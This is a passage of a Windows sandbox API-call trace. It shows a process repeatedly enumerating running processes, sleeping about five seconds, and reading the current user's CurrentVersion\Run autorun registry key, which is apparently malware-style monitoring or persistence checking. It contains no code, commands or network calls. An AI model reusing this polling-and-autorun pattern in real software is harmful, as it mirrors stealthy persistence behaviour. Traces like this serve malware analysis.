NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.063] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.074] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.074] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.074] NtClose (Handle=0x154) returned 0x0 [0188.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.078] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.091] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.091] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.091] NtClose (Handle=0x154) returned 0x0 [0188.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.095] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.109] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.109] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.109] NtClose (Handle=0x154) returned 0x0 [0188.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.116] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.122] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.122] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.122] NtClose (Handle=0x154) returned 0x0 [0188.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.128] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.136] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.136] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.136] NtClose (Handle=0x154) returned 0x0 [0188.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.141] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.152] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.152] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.152] NtClose (Handle=0x154) returned 0x0 [0188.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.156] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.168] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.168] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.168] NtClose (Handle=0x154) returned 0x0 [0188.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.172] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.183] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.183] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.183] NtClose (Handle=0x154) returned 0x0 [0188.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.188] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.200] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.200] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.200] NtClose (Handle=0x154) returned 0x0 [0188.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.206] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.232] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.232] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.233] NtClose (Handle=0x154) returned 0x0 [0188.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.236] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.246] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.246] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.246] NtClose (Handle=0x154) returned 0x0 [0188.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.252] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.261] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.261] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.261] NtClose (Handle=0x154) returned 0x0 [0188.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.265] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.278] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.278] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.278] NtClose (Handle=0x154) returned 0x0 [0188.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, 